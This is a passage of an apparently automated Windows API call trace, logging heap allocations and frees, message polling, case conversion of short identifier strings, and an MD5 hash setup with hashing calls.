lpsz="A5400102815") returned 0xb [0256.114] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.115] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.115] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.115] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.115] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.115] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.115] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.115] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.116] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.116] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.116] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.116] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.116] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.116] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.117] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.117] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.117] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.117] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.117] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0256.117] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.117] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.118] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.118] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.118] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.118] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.118] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.118] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.119] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.119] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.119] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.119] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.120] CryptCreateHash (in: hProv=0xad2698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0256.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0256.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0256.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0256.120] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.120] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.121] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.121] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.122] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0256.122] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0256.122] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.123] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.123] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.123] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.123] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.123] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.124] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0256.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.124] CryptHashData (hHash=0xaa5960, pbData=0x24b17b8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0256.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0256.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0256.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0256.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0256.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0256.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0256.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 